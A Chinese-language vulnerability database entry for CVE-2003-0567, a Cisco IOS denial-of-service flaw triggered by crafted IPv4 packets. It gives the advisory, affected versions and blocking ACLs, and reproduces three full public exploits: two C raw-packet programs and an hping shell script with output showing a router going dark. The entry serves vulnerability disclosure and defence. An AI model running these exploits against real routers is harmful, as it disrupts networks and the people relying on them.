CVE-2003-0567
CVSS7.8
发布时间 :2003-08-18 00:00:00
修订时间 :2009-03-04 00:18:33
NMCOES    

[原文]Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to an interface on the device, causing the input queue on that interface to be marked as full.


[CNNVD]Cisco IOS IPv4报文处理拒绝服务攻击漏洞(CNNVD-200308-107)

        
        Cisco IOS是部署非常广泛的网络操作系统。很多Cisco设备都运行IOS。
        IOS 12.3以下版本中存在一个漏洞可能允许攻击者对受影响的设备执行拒绝服务攻击。这个漏洞影响所有运行Cisco IOS软件并且处理IPv4报文的Cisco设备。
        Cisco路由器缺省就被配置为接收并处理IPv4报文,通过向路由器的某个接口按照一个特殊顺序发送协议类型为53 (SWIPE)、55 (IP Mobility)、77(Sun ND)或者103 (Protocol Independent Multicast - PIM)的IPv4报文,目标路由器处理时会错误地将该接口的输入队列标识为已满状态,这将导致路由器停止处理该接口上的流量,包括路由协议报文和ARP报文。攻击不会触发任何警报,路由器也不会自动重载。必须手工重新启动路由器才能恢复正常功能。
        攻击者可以重复地对该Cisco设备的所有接口进行攻击,从而使该路由器无法被远程访问。
        <*链接:http://www.cert.org/advisories/CA-2003-15.html
         http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml
         *>

- CVSS (基础分值)

CVSS分值: 7.8 [严重(HIGH)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-20 [输入验证不恰当]

- CPE (受影响的平台与产品)

cpe:/o:cisco:ios:12.1ewCisco IOS 12.1EW
cpe:/o:cisco:ios:12.2yoCisco IOS 12.2YO
cpe:/o:cisco:ios:11.3tCisco IOS 11.3T
cpe:/o:cisco:ios:12.1yeCisco IOS 12.1YE
cpe:/o:cisco:ios:12.1xvCisco IOS 12.1XV
cpe:/o:cisco:ios:12.2xfCisco IOS 12.2XF
cpe:/o:cisco:ios:12.0sCisco IOS 12.0S
cpe:/o:cisco:ios:12.0scCisco IOS 12.0SC
cpe:/o:cisco:ios:12.0sxCisco IOS 12.0SX
cpe:/o:cisco:ios:12.2xeCisco IOS 12.2XE
cpe:/o:cisco:ios:12.1mCisco IOS 12.1 M
cpe:/o:cisco:ios:12.0szCisco IOS 12.0SZ
cpe:/o:cisco:ios:12.2xdCisco IOS 12.2XD
cpe:/o:cisco:ios:12.1tCisco IOS 12.1T
cpe:/o:cisco:ios:12.2xhCisco IOS 12.2XH
cpe:/o:cisco:ios:12.1xfCisco IOS 12.1XF
cpe:/o:cisco:ios:12.2xqCisco IOS 12.2XQ
cpe:/o:cisco:ios:12.2yxCisco IOS 12.2YX
cpe:/o:cisco:ios:12.1xxCisco IOS 12.1XX
cpe:/o:cisco:ios:12.1xlCisco IOS 12.1XL
cpe:/o:cisco:ios:12.0xgCisco IOS 12.0XG
cpe:/o:cisco:ios:12.1xcCisco IOS 12.1XC
cpe:/o:cisco:ios:12.0wtCisco IOS 12.0WT
cpe:/o:cisco:ios:12.2mcCisco IOS 12.2MC
cpe:/o:cisco:ios:12.1xtCisco IOS 12.1XT
cpe:/o:cisco:ios:12.0slCisco IOS 12.0SL
cpe:/o:cisco:ons_15454_optical_transport_platform:3.0
cpe:/o:cisco:ios:12.2yqCisco IOS 12.2YQ
cpe:/o:cisco:ios:12.2bzCisco IOS 12.2BZ
cpe:/o:cisco:ios:12.1xpCisco IOS 12.1XP
cpe:/o:cisco:ios:12.0xwCisco IOS 12.0 XW
cpe:/o:cisco:ios:12.2cyCisco IOS 12.2CY
cpe:/o:cisco:ios:12.2bwCisco IOS 12.2BW
cpe:/o:cisco:ios:12.2yzCisco IOS 12.2YZ
cpe:/o:cisco:ios:12.2szCisco IOS 12.2SZ
cpe:/o:cisco:ios:11.1Cisco IOS 11.1
cpe:/o:cisco:ios:12.2xkCisco IOS 12.2XK
cpe:/o:cisco:ios:12.1xsCisco IOS 12.1XS
cpe:/o:cisco:ios:12.2yrCisco IOS 12.2YR
cpe:/o:cisco:ons_15454_optical_transport_platform:3.1_.0
cpe:/o:cisco:ios:12.1xjCisco IOS 12.1XJ
cpe:/o:cisco:ios:12.0xmCisco IOS 12.0XM
cpe:/o:cisco:ios:12.0w5Cisco IOS 12.0W5
cpe:/o:cisco:ios:12.1xzCisco IOS 12.1XZ
cpe:/o:cisco:ios:12.2bxCisco IOS 12.2BX
cpe:/o:cisco:ios:12.0dbCisco IOS 12.0DB
cpe:/o:cisco:ios:12.2xmCisco IOS 12.2XM
cpe:/o:cisco:ios:12.1xiCisco IOS 12.1XI
cpe:/h:cisco:ons_15454_optical_transport_platform
cpe:/o:cisco:ios:12.1ayCisco IOS 12.1AY
cpe:/o:cisco:ios:12.1ebCisco IOS 12.1EB
cpe:/o:cisco:ios:11.3Cisco IOS 11.3
cpe:/o:cisco:ios:12.2yvCisco IOS 12.2YV
cpe:/o:cisco:ios:12.2zeCisco IOS 12.2ZE
cpe:/o:cisco:ios:12.0xlCisco IOS 12.0XL
cpe:/o:cisco:ios:12.1xeCisco IOS 12.1XE
cpe:/o:cisco:ios:12.2yuCisco IOS 12.2YU
cpe:/o:cisco:ios:12.1xdCisco IOS 12.1XD
cpe:/o:cisco:ons_15454_optical_transport_platform:4.0
cpe:/o:cisco:ios:12.1eaCisco IOS 12.1EA
cpe:/o:cisco:ios:12.2mbCisco IOS 12.2MB
cpe:/o:cisco:ios:12.2yyCisco IOS 12.2YY
cpe:/o:cisco:ios:12.1daCisco IOS 12.1DA
cpe:/o:cisco:ios:12.2zfCisco IOS 12.2ZF
cpe:/o:cisco:ios:11.1caCisco IOS 11.1 CA
cpe:/o:cisco:ios:11.0Cisco IOS 11.0
cpe:/o:cisco:ios:12.0dcCisco IOS 12.0DC
cpe:/o:cisco:ios:12.1xaCisco IOS 12.1XA
cpe:/o:cisco:ios:12.2ypCisco IOS 12.2YP
cpe:/o:cisco:ios:12.2xnCisco IOS 12.2XN
cpe:/o:cisco:ios:12.1Cisco IOS 12.1
cpe:/o:cisco:ios:11.2pCisco IOS 11.2P
cpe:/o:cisco:ios:12.0xbCisco IOS 12.0XB
cpe:/o:cisco:ios:12.2ynCisco IOS 12.2YN
cpe:/o:cisco:ios:12.0xeCisco IOS 12.0XE
cpe:/o:cisco:ios:11.1ccCisco IOS 11.1CC
cpe:/o:cisco:ios:12.1xkCisco IOS 12.1XK
cpe:/o:cisco:ios:12.2xjCisco IOS 12.2XJ
cpe:/o:cisco:ios:12.2xaCisco IOS 12.2XA
cpe:/o:cisco:ios:12.2mxCisco IOS 12.2MX
cpe:/o:cisco:ios:12.2zhCisco IOS 12.2ZH
cpe:/o:cisco:ios:12.0xaCisco IOS 12.0XA
cpe:/o:cisco:ons_15454_optical_transport_platform:3.4
cpe:/o:cisco:ios:12.2xgCisco IOS 12.2XG
cpe:/o:cisco:ios:12.2xuCisco IOS 12.2XU
cpe:/o:cisco:ios:12.1xqCisco IOS 12.1XQ
cpe:/o:cisco:ios:12.0xcCisco IOS 12.0XC
cpe:/o:cisco:ios:12.0tCisco IOS 12.0T
cpe:/o:cisco:ios:12.2cxCisco IOS 12.2CX
cpe:/o:cisco:ios:12.1ybCisco IOS 12.1YB
cpe:/o:cisco:ios:12.2jaCisco IOS 12.2JA
cpe:/o:cisco:ios:12.2ydCisco IOS 12.2YD
cpe:/o:cisco:ios:12.1axCisco IOS 12.1AX
cpe:/o:cisco:ios:12.2zjCisco IOS 12.2ZJ
cpe:/o:cisco:ios:12.0xiCisco IOS 12.0XI
cpe:/o:cisco:ios:12.1xrCisco IOS 12.1XR
cpe:/o:cisco:ios:12.2xtCisco IOS 12.2XT
cpe:/o:cisco:ios:12.1evCisco IOS 12.1EV
cpe:/o:cisco:ios:12.2ytCisco IOS 12.2YT
cpe:/o:cisco:ios:12.2xbCisco IOS 12.2XB
cpe:/o:cisco:ios:12.0Cisco IOS 12.0
cpe:/o:cisco:ios:12.1xwCisco IOS 12.1XW
cpe:/o:cisco:ios:12.1yhCisco IOS 12.1YH
cpe:/o:cisco:ios:12.2ywCisco IOS 12.2YW
cpe:/o:cisco:ios:12.0xrCisco IOS 12.0XR
cpe:/o:cisco:ios:12.2zaCisco IOS 12.2ZA
cpe:/o:cisco:ios:12.2ybCisco IOS 12.2YB
cpe:/o:cisco:ios:11.1aaCisco IOS 11.1 AA
cpe:/o:cisco:ios:12.2bcCisco IOS 12.2BC
cpe:/o:cisco:ios:12.1xbCisco IOS 12.1XB
cpe:/o:cisco:ios:12.0xpCisco IOS 12.0XP
cpe:/o:cisco:ios:12.1xgCisco IOS 12.1XG
cpe:/o:cisco:ios:12.2yhCisco IOS 12.2YH
cpe:/o:cisco:ios:12.2Cisco IOS 12.2
cpe:/o:cisco:ios:12.0xsCisco IOS 12.0XS
cpe:/o:cisco:ios:12.1ydCisco IOS 12.1YD
cpe:/o:cisco:ios:12.2xwCisco IOS 12.2XW
cpe:/o:cisco:ios:12.2xrCisco IOS 12.2XR
cpe:/o:cisco:ios:12.2xiCisco IOS 12.2XI
cpe:/o:cisco:ios:12.2yaCisco IOS 12.2YA
cpe:/o:cisco:ons_15454_optical_transport_platform:3.2_.0
cpe:/o:cisco:ios:12.2zbCisco IOS 12.2ZB
cpe:/o:cisco:ios:12.2daCisco IOS 12.2DA
cpe:/o:cisco:ios:12.2ygCisco IOS 12.2YG
cpe:/o:cisco:ios:12.2zgCisco IOS 12.2ZG
cpe:/o:cisco:ios:12.2ymCisco IOS 12.2YM
cpe:/o:cisco:ios:12.2yfCisco IOS 12.2YF
cpe:/o:cisco:ios:12.1xuCisco IOS 12.1XU
cpe:/o:cisco:ios:12.0xjCisco IOS 12.0XJ
cpe:/o:cisco:ios:11.2saCisco IOS 11.2 SA
cpe:/o:cisco:ios:12.0stCisco IOS 12.0ST
cpe:/o:cisco:ios:12.2ysCisco IOS 12.2YS
cpe:/o:cisco:ios:12.1yjCisco IOS 12.1YJ
cpe:/o:cisco:ios:12.2yjCisco IOS 12.2YJ
cpe:/o:cisco:ios:12.2bCisco IOS 12.2B
cpe:/o:cisco:ios:12.1ycCisco IOS 12.1YC
cpe:/o:cisco:ios:12.0xuCisco IOS 12.0XU
cpe:/o:cisco:ios:12.2xcCisco IOS 12.2XC
cpe:/o:cisco:ios:12.1yiCisco IOS 12.1YI
cpe:/o:cisco:ios:12.0syCisco IOS 12.0SY
cpe:/o:cisco:ios:12.1eyCisco IOS 12.1EY
cpe:/o:cisco:ons_15454_optical_transport_platform:3.3
cpe:/o:cisco:ios:12.2sxCisco IOS 12.2SX
cpe:/o:cisco:ios:12.2ycCisco IOS 12.2YC
cpe:/o:cisco:ios:12.1aaCisco IOS 12.1AA
cpe:/o:cisco:ios:12.2ylCisco IOS 12.2YL
cpe:/o:cisco:ios:12.1dbCisco IOS 12.1DB
cpe:/o:cisco:ios:12.2xsCisco IOS 12.2XS
cpe:/o:cisco:ios:12.2ddCisco IOS 12.2DD
cpe:/o:cisco:ios:12.0xqCisco IOS 12.0XQ
cpe:/o:cisco:ios:12.0xdCisco IOS 12.0XD
cpe:/o:cisco:ios:12.1yfCisco IOS 12.1YF
cpe:/o:cisco:ios:12.2zdCisco IOS 12.2ZD
cpe:/o:cisco:ios:12.0wcCisco IOS 12.0WC
cpe:/o:cisco:ios:12.1ecCisco IOS 12.1EC
cpe:/o:cisco:ios:12.0xkCisco IOS 12.0XK
cpe:/o:cisco:ios:11.2Cisco IOS 11.2
cpe:/o:cisco:ios:12.1eCisco IOS 12.1E
cpe:/o:cisco:ios:12.0daCisco IOS 12.0DA
cpe:/o:cisco:ios:12.1exCisco IOS 12.1EX
cpe:/o:cisco:ios:12.0spCisco IOS 12.0SP
cpe:/o:cisco:ios:12.0xhCisco IOS 12.0XH
cpe:/o:cisco:ios:12.0xvCisco IOS 12.0Xv
cpe:/o:cisco:ios:12.2zcCisco IOS 12.2ZC
cpe:/o:cisco:ios:12.0xfCisco IOS 12.0XF
cpe:/o:cisco:ios:12.2sCisco IOS 12.2S
cpe:/o:cisco:ios:12.2syCisco IOS 12.2SY
cpe:/o:cisco:ios:12.1xhCisco IOS 12.1XH
cpe:/o:cisco:ios:12.1xyCisco IOS 12.1XY
cpe:/o:cisco:ios:12.2ykCisco IOS 12.2YK
cpe:/o:cisco:ios:12.2dxCisco IOS 12.2DX
cpe:/o:cisco:ios:12.0xnCisco IOS 12.0XN
cpe:/o:cisco:ios:12.1dcCisco IOS 12.1DC
cpe:/o:cisco:ios:12.2xlCisco IOS 12.2XL
cpe:/o:cisco:ios:12.2tCisco IOS 12.2T
cpe:/o:cisco:ios:12.1xmCisco IOS 12.1XM

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:5603Cisco Systems IOS 11.x/12.x DoS Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0567
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0567
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-107
(官方数据源) CNNVD

- 其它链接及资源

http://www.cert.org/advisories/CA-2003-17.html
(VENDOR_ADVISORY)  CERT  CA-2003-17
http://www.cert.org/advisories/CA-2003-15.html
(VENDOR_ADVISORY)  CERT  CA-2003-15
http://www.kb.cert.org/vuls/id/411332
(UNKNOWN)  CERT-VN  VU#411332
http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml
(UNKNOWN)  CISCO  20030717 IOS Interface Blocked by IPv4 Packet
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006743.html
(UNKNOWN)  FULLDISC  20030718 (no subject)

- 漏洞信息

Cisco IOS IPv4报文处理拒绝服务攻击漏洞
高危 输入验证
2003-08-18 00:00:00 2009-03-04 00:00:00
远程  
        
        Cisco IOS是部署非常广泛的网络操作系统。很多Cisco设备都运行IOS。
        IOS 12.3以下版本中存在一个漏洞可能允许攻击者对受影响的设备执行拒绝服务攻击。这个漏洞影响所有运行Cisco IOS软件并且处理IPv4报文的Cisco设备。
        Cisco路由器缺省就被配置为接收并处理IPv4报文,通过向路由器的某个接口按照一个特殊顺序发送协议类型为53 (SWIPE)、55 (IP Mobility)、77(Sun ND)或者103 (Protocol Independent Multicast - PIM)的IPv4报文,目标路由器处理时会错误地将该接口的输入队列标识为已满状态,这将导致路由器停止处理该接口上的流量,包括路由协议报文和ARP报文。攻击不会触发任何警报,路由器也不会自动重载。必须手工重新启动路由器才能恢复正常功能。
        攻击者可以重复地对该Cisco设备的所有接口进行攻击,从而使该路由器无法被远程访问。
        <*链接:http://www.cert.org/advisories/CA-2003-15.html
         http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml
         *>

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在路由器上通过访问控制列表(ACL)过滤从未授权地址直接发往路由器本身地址的流量。
         使用访问控制列表可能造成性能影响,您应当根据实际情况谨慎选用合理的访问控制列表。
         您可以参考Cisco提供的下列文档进行设置:
        
        http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml#workarounds

        
        http://www.cisco.com/warp/public/707/racl.html

        
        http://www.cisco.com/warp/public/707/iacl.html

         Cisco 也提供了一个样例ACL, 禁止所有协议类型为53,55,77,103的报文通过路由器:
         access-list 101 deny 53 any any
         access-list 101 deny 55 any any
         access-list 101 deny 77 any any
         access-list 101 deny 103 any any
         !--- insert any other previously applied ACL entries here
         !--- you must permit other protocols through to allow normal
         !--- traffic -- previously defined permit lists will work
         !--- or you may use the permit ip any any shown here
         access-list 101 permit ip any any
        厂商补丁:
        Cisco
        -----
        Cisco已经为此发布了一个安全公告(cisco-sa-20030717-blocked)以及相应补丁:
        cisco-sa-20030717-blocked:Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packet
        链接:
        http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml

        您可以从Cisco网站的软件中心下载升级程序:
        
        http://www.cisco.com/tacpage/sw-center/sw-ios.shtml

        或者联系相关销售方进行升级。

- 漏洞信息 (59)

Cisco IOS IPv4 Packets Denial of Service Exploit (EDBID:59)
hardware dos
2003-07-18 Verified
0 l0cK
N/A [点击下载]
/*
* ShadowChode - Cisco IOS IPv4 Packet Processing Denial of Service Exploit
*
* Ping target router/switch for TTL to host. Subtract that number from 255
* and use that TTL on the command line. The TTL must equal 0 or 1 when it
* reaches the target. The target must accept packets to the given target
* interface address and there are some other caveats.
*
* BROUGHT TO YOU BY THE LETTERS C AND D
*
* [L0cK]
*/

#include <stdio.h>
#include <sys/types.h>

#include "libnet.h"

#define MIN_PAYLOAD_LEN (26)

#define CLEANUP { \
libnet_destroy(lh); \
free(payload); \
}

int
main(int argc, char *argv[])
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lh;
u_long dst_addr;
int ttl;
int payload_len;
char *payload;
libnet_ptag_t data_tag;
libnet_ptag_t ip_tag;
int i;
int len;
int protocols[] = { 53, 55, 77, 103 };
struct libnet_stats ls;

lh = libnet_init(LIBNET_RAW4, NULL, errbuf);

if (lh == NULL) {
(void) fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(-1);
}

if (argc != 3 || (dst_addr = libnet_name2addr4(lh, argv[1], LIBNET_RESOLVE) == -1)) {
(void) fprintf(stderr, "Usage: %s <target> <ttl>\n", argv[0]);
libnet_destroy(lh);
exit(-1);
}

{ /* OH WAIT, ROUTE'S RESOLVER DOESN'T WORK! */
struct in_addr dst;

if (!inet_aton(argv[1], &dst)) {
perror("inet_aton");
libnet_destroy(lh);
exit(-1);
}

dst_addr = dst.s_addr;
}

ttl = atoi(argv[2]);

libnet_seed_prand(lh);

len = libnet_get_prand(LIBNET_PR8);

/* Mmmmm, suck up random amount of memory! */

payload_len = (MIN_PAYLOAD_LEN > len) ? MIN_PAYLOAD_LEN : len;

payload = (char *) malloc(payload_len);

if (payload == NULL) {
perror("malloc");
libnet_destroy(lh);
exit(-1);
}

for (i = 0; i < payload_len; i++) {
payload[i] = i;
}

data_tag = LIBNET_PTAG_INITIALIZER;

data_tag = libnet_build_data(payload, payload_len, lh, data_tag);

if (data_tag == -1) {
(void) fprintf(stderr, "Can't build data block: %s\n", libnet_geterror(lh));
CLEANUP;
exit(-1);
}

ip_tag = LIBNET_PTAG_INITIALIZER;

for (i = 0; i < 4; i++) {
ip_tag = libnet_build_ipv4(LIBNET_IPV4_H + payload_len, 0, libnet_get_prand(LIBNET_PRu16),
 0, ttl, protocols[i], 0, libnet_get_prand(LIBNET_PRu32), dst_addr, NULL, 0, lh, ip_tag);

if (ip_tag == -1) {
(void) fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(lh));
CLEANUP;
exit(-1);
}

len = libnet_write(lh);

if (len == -1) {
(void) fprintf(stderr, "Write error: %s\n", libnet_geterror(lh));
}
}

libnet_stats(lh, &ls);

(void) fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);

CLEANUP;

return (0);
}

// milw0rm.com [2003-07-18]
		

- 漏洞信息 (60)

Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c) (EDBID:60)
hardware dos
2003-07-21 Verified
0 Martin Kluge
N/A [点击下载]
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge (martin@elxsi.de) */
/*                                                                                            */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement.                                               */
/*                                                                                            */
/* Please use this code only to check your OWN cisco routers.         */
/*                                                                                            */
/*                                                                                            */
/* This exploit uses the bug in recent IOS versions to stop router    */
/* from processing traffic once the input queue is full.                    */
/*                                                                                            */
/*                                                                                            */
/* Use access control lists as described in the CISCO advisory to     */
/* protect your cisco routers:                                                       */
/*                                                                                            */
/* access-list 101 deny 53 any any                                              */
/* access-list 101 deny 55 any any                                              */
/* access-list 101 deny 77 any any                                              */
/* access-list 101 deny 103 any any                                            */
/*                                                                                            */
/* This code was only tested on linux, no warranty is or will be        */
/*                                                                                            */
/* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number>  */
/* Source IP: Your source IP (or a spoofed source IP)                    */
/* Destination IP: The IP of the vulnerable cisco router                  */
/* Hops: The number of hops between you and the router,             */
/* the time to live (ttl) should be 0 when the packet                      */
/* is received by the cisco router.                                                 */
/* Number: Number of packets to send (0 = loop)                         */
/* provided.                                                                              */
/*******************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#define DEBUG

#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif

/* IPv4 header */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};


char proto[] = {53,55,77,103};


/* Prototypes */
int in_cksum (unsigned short *, int, int);


/* Main function */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;

unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;

unsigned char *buf;

/* Check command line args */ 
if(argc != 5) {
fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
return(EXIT_FAILURE);
}

src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);

if(count == 0) { loop=1; count=1; }

#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif

/* Open a raw socket */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}

/* Build the IPv4 header */
ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
ipv4_hdr.type_service = 0x10;

#ifdef OSTYPE_BSD
ipv4_hdr.packet_len = 0x14 + len;
ipv4_hdr.fragment = 0x4000;
#else
ipv4_hdr.packet_len = htons(0x14 + len);
ipv4_hdr.fragment = htons(0x4000);
#endif

ipv4_hdr.time_live = hops;
ipv4_hdr.src_ip.s_addr = src_ip;
ipv4_hdr.dst_ip.s_addr = dst_ip;

while(n < count) {
/* Seed the random generator */
if(gettimeofday(&seed, NULL) == -1) {
fprintf(stderr, "Error: Cannot seed the random generator.\n");
return(EXIT_FAILURE);
}

srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));

ipv4_hdr.protocol = proto[random() % 0x4];

#ifdef DEBUG
printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
#endif

ipv4_hdr.ident = htons(random() % 0x7fff);

/* Calculate checksum */
ipv4_hdr.sum = 0x0000;
ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);

#ifdef DEBUG
printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
#endif

buf = malloc(0x14 + len);
memset(buf, '\0', 0x14 + len);

memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
0x14 + len);

#ifdef DEBUG
printf("DEBUG: ");
for(i=0; i < 0x14 + len; i++)
printf(" %02x", buf[i]);
printf("\n");
#endif


memset(&sin, '\0', sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = dst_ip;

bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr));

#ifdef DEBUG
printf("DEBUG: Wrote %i bytes.\n", bytes);
#endif

if(loop != 1) n++;

free(buf);
}

close(fd);
return(EXIT_SUCCESS);
}


int in_cksum(unsigned short *addr, int len, int csum) {
register int sum = csum;
unsigned short answer = 0;
register unsigned short *w = addr;
register int nleft = len;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w<<8);
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}


// milw0rm.com [2003-07-21]
		

- 漏洞信息 (62)

Cisco IOS (using hping) Remote Denial of Service Exploit (EDBID:62)
hardware dos
2003-07-22 Verified
0 zerash
N/A [点击下载]
#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
# 
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example : 
# 
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet loss
# round-trip min/avg/max/std-dev = 0.817/1.052/1.287/0.235 ms
#
# root@evicted # ./ciscodos.sh 192.168.1.1 0
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# HPING 192.168.1.1 (dc0 192.168.1.1): raw IP mode set, 20 headers + 26 data bytes
# --- 192.168.1.1 hping statistic ---
# 19 packets tramitted, 0 packets received, 100% packet loss
# round-trip min/avg/max = 0.0/0.0/0.0 ms
# -------------SNIP---------------
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 0 packets received, 100% packet loss
# -------------SNIP---------------
#
# Coded by zerash@evicted.org 
#

if ($1 == "" || $2 == "") then
echo "usage: $0 <router hostname|address> <ttl>"
exit
endif

foreach protocol (53)
/usr/local/sbin/hping $1 --rawip --rand-source --ttl $2 --ipproto $protocol --count 76 --interval u250 --data 26
end

# milw0rm.com [2003-07-22]
		

- 漏洞信息

2325
Cisco IOS Malformed IPv4 Packet Remote DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Cisco IOS contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted sequence of IPv4 packets are sent to an interface of the device, and will result in loss of availability for the interface.

- 时间线

2003-07-17 2003-07-17
Unknow Unknow

- 解决方案

Upgrade to version indicated by the Cisco product matrix, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Cisco IOS Malicious IPV4 Packet Sequence Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 8211
Yes No
2003-07-16 12:00:00 2009-07-11 10:56:00
This vulnerability was announced by the vendor.

- 受影响的程序版本

Cisco ONS 15454 Optical Transport Platform 4.0 (1)
Cisco ONS 15454 Optical Transport Platform 4.0
Cisco ONS 15454 Optical Transport Platform 3.4
Cisco ONS 15454 Optical Transport Platform 3.3
Cisco ONS 15454 Optical Transport Platform 3.2 .0
Cisco ONS 15454 Optical Transport Platform 3.1 .0
Cisco ONS 15454 Optical Transport Platform 3.0
Cisco IOS 12.2 12.2XU
Cisco IOS 12.0.19
Cisco IOS 12.0.7 (T)
Cisco IOS 12.0.7
Cisco IOS 12.0.6
Cisco IOS 12.0.5
Cisco IOS 12.0.4 T
Cisco IOS 12.0.4 S
Cisco IOS 12.0.4
Cisco IOS 12.0.3 T2
Cisco IOS 12.0.3
Cisco IOS 12.0.2 XG
Cisco IOS 12.0.2 XF
Cisco IOS 12.0.2 XD
Cisco IOS 12.0.2 XC
Cisco IOS 12.0.2
Cisco IOS 12.0.1 XE
Cisco IOS 12.0.1 XB
Cisco IOS 12.0.1 XA3
Cisco IOS 12.0.1 W
Cisco IOS 12.0.1
Cisco IOS 11.3.11 b
Cisco IOS 11.3.1 T
Cisco IOS 11.3.1 ED
Cisco IOS 11.3.1
Cisco IOS 11.2.10 BC
Cisco IOS 11.2.10
Cisco IOS 11.2.9 XA
Cisco IOS 11.2.9 P
Cisco IOS 11.2.8 SA5
Cisco IOS 11.2.8 SA3
Cisco IOS 11.2.8 SA1
Cisco IOS 11.2.8 P
Cisco IOS 11.2.8
Cisco IOS 11.2.4 F1
Cisco IOS 11.2.4 F
Cisco IOS 11.2.4
Cisco IOS 11.1.17 CT
Cisco IOS 11.1.17 CC
Cisco IOS 11.1.16 IA
Cisco IOS 11.1.16 AA
Cisco IOS 11.1.16
Cisco IOS 11.1.15 IA
